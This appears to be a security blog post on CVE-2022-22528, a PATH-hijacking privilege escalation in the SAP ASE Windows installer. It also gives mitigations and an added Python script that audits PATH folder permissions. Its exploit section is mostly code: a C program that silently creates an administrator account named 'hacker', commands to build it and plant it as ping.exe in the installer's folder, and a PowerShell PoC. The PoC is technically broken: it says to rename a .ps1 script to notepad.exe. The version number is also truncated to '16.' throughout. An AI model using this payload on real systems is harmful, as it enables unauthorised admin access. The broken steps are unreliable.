
Introduction

In early 2022, a serious vulnerability (CVE-2022-22528) was discovered affecting SAP Adaptive Server Enterprise (ASE) version 16.—one of the most popular enterprise database management systems. This flaw doesn't impact ASE’s everyday operations, but targets its Windows installer process, leaving systems open to local privilege escalation.

In this post, we’ll break down how this vulnerability happens, what risks it opens up, show you code snippets of the exploitation scenario, and point to the original references. By the end, you'll know why this problem matters and what you can do to defend your systems.

- Affected Product: SAP Adaptive Server Enterprise (ASE) 16. (Installer on Windows)

- Issue: During installation on Windows, ASE modifies the system PATH environment variable insecurely. Under certain configurations, this lets regular (non-admin) users trick the system into running malicious programs as SYSTEM or Administrator.

This vulnerability does NOT impact ASE's server binaries or daily use. The problem only happens during or shortly after installation.

References

- SAP Security Note 3149805 - Privilege escalation vulnerability in SAP ASE
- NIST NVD Entry: CVE-2022-22528

How Does the Exploit Work?

Many Windows programs depend on the PATH environment variable to find needed .dlls and .exes. If the PATH includes a world-writable folder early on, Windows may *accidentally* run malicious files an attacker has placed there instead of the trusted binaries.

When ASE 16. is installed, the installer adds its installation folder (like C:\SAP\ASE\bin) to the system PATH, sometimes leaving that folder with insecure permissions. If this folder is writable by anyone (including low-privileged users), the door is open:

1. Standard User drops a fake executable (like notepad.exe, cmd.exe, or even a popular DLL filename) into C:\SAP\ASE\bin.
2. If any Admin or SYSTEM-level process launches a program or DLL searching the PATH, Windows grabs the attacker’s fake binary, not the real one—running it with powerful privileges.

Open Command Prompt and run

echo %PATH%

Find any folder (like C:\SAP\ASE\bin) that you can write into.

Check permissions

icacls "C:\SAP\ASE\bin"

If you see entries like Everyone:(OI)(CI)(F) or Users:(OI)(CI)(M), BINGO—the folder is writable.

2. Drop a Malicious Executable

Suppose an admin runs something that checks the PATH for ping.exe. We'll make our own evil ping.exe:

// evilping.c: Runs a payload (adds user 'hacker' with admin rights)
#include <stdlib.h>

int main() {
    system("net user hacker Passwrd! /add");
    system("net localgroup administrators hacker /add");
    return 0;
}

Build it (with MinGW or Visual Studio)

gcc evilping.c -o ping.exe

Copy it to the vulnerable folder

copy ping.exe C:\SAP\ASE\bin\

3. Wait for the Right Process

Whenever ANY admin-level process calls ping (or any other poisoned command), Windows will run YOUR binary from C:\SAP\ASE\bin, not the real C:\Windows\System32\ping.exe.

4. Privilege Escalation Obtained

Now, you have a new admin account named 'hacker', created silently by your injected binary.

Proof of Concept (PoC) — Quick Demo

Here's a PowerShell PoC you can adapt. Suppose a non-admin user can write to the ASE bin folder.

# PoC: Drop a trojan notepad.exe in vulnerable PATH folder
$payload = @"
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show('You just ran my trojan as admin!')
"@
Set-Content -Path ".\notepad.ps1" -Value $payload
powershell.exe -ExecutionPolicy Bypass -File .\notepad.ps1

Rename the payload to notepad.exe and drop it in C:\SAP\ASE\bin. The next time an admin runs notepad, they get compromised.

Am I Affected?

- You’re at risk if your Windows machine has SAP ASE 16. installed AND its installer left a writable folder in the PATH.
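
To check this on a host, the following added example (not code from SAP or from the original post) parses `icacls` output for every PATH entry and reports the entries that grant file-creation rights to low-privileged groups. The function names, the principals beyond Everyone and Users, and the sample ACLs are assumptions constructed for illustration.

```python
import re
import subprocess

# Principals treated as low-privileged. "Everyone" and "Users" are the ones the
# article names; the rest are assumptions (English-language Windows names).
LOW_PRIV = {"everyone", "users", "builtin\\users", "authenticated users",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls rights that allow adding a file: full, modify, write, add-file, generic all/write.
WRITE_RIGHTS = {"F", "M", "W", "WD", "GA", "GW"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Za-z,]+\))+)$")

def risky_aces(directory, icacls_text):
    """Return (principal, flags) ACEs that let low-privileged users add files."""
    hits = []
    for line in icacls_text.splitlines():
        line = line.strip()
        if line.lower().startswith(directory.lower()):
            line = line[len(directory):].strip()  # first line repeats the path
        m = ACE_RE.match(line)
        if not m or m["who"].lower() not in LOW_PRIV:
            continue  # blank/summary line, or a principal we do not flag
        flags = set(re.findall(r"[A-Za-z]+", m["flags"]))
        # Deny ACEs and inherit-only (IO) ACEs grant no write on this folder.
        if flags & WRITE_RIGHTS and not flags & {"DENY", "IO"}:
            hits.append((m["who"], m["flags"]))
    return hits

def run_icacls(directory):
    """Default ACL source: the icacls command used in the article (Windows only)."""
    return subprocess.run(["icacls", directory], capture_output=True, text=True).stdout

def audit_path(path_value, acl_source=run_icacls):
    """Map each PATH directory to its risky ACEs; clean directories are omitted."""
    findings = {}
    for entry in path_value.split(";"):
        directory = entry.strip().strip('"')
        hits = risky_aces(directory, acl_source(directory)) if directory else []
        if hits:
            findings[directory] = hits
    return findings

# Constructed sample data (not captured from a real host).
SAMPLE_PATH = 'C:\\Windows\\System32;"C:\\SAP\\ASE\\bin";'
SAMPLE_ACLS = {
    "C:\\Windows\\System32": "C:\\Windows\\System32 BUILTIN\\Users:(RX)\n",
    "C:\\SAP\\ASE\\bin": "C:\\SAP\\ASE\\bin BUILTIN\\Administrators:(OI)(CI)(F)\n"
                         "               BUILTIN\\Users:(OI)(CI)(M)\n"
                         "               Everyone:(OI)(CI)(IO)(F)\n",
}
```

Calling `audit_path(SAMPLE_PATH, SAMPLE_ACLS.get)` runs the check against the constructed data; on a Windows host, passing the machine PATH string as the only argument makes it call the real `icacls`.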

Mitigations & Fix

- SAP’s Fix: Apply the patch or updated installer from SAP Note 3149805
- Short-term: Remove world-write permissions on the installation folder, or remove it from PATH if not strictly necessary.

Final Notes

This kind of “PATH hijacking” is a classic privilege escalation trick on Windows, but it’s often overlooked during quick installs. While CVE-2022-22528 only affects the installation process of SAP ASE on Windows, it’s a good reminder: Always check your environment variables and folder permissions.

For admins:
Be sure your install routines don’t unintentionally open up security holes—and patch vulnerable applications as soon as possible.

More Resources

- SAP Security Patch Day Blog
- NIST NVD Entry: CVE-2022-22528
- SAP Note 3149805 (Official)

Stay safe, and always check your PATH.

*© 2024 – For educational purposes and responsible disclosure only.*

Timeline

Published on: 02/09/2022 23:15:00 UTC
Last modified on: 08/24/2022 16:15:00 UTC